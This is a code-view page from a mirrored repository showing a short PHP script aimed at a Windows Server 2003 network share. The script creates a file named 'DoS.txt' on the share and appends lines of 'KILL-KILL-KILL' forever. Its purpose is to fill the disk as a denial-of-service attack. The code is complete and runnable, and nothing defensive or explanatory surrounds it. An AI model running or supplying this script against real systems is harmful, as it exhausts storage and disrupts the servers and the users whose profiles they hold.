docs
[mirrors/Programs.git] / php / MS_W_Server2003.php
CommitLineData
ff84fa69
H
1<?php\r
2$path = "\\\\winserver2003\\profily\\profilek";\r
3$file = "DoS.txt".rand(1,999999);\r
4\r
5while(1) {\r
6\r
7$fp = fopen("$path\\$file", "a") or die("Cannot fopen!!!\n");\r
8echo("fopen\n");\r
9while(!feof($fp)) {\r
10 fwrite($fp, "KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL\r\n");\r
11}\r
12fclose($fp);\r
13\r
14}
This page took 0.174478 seconds and 4 git commands to generate.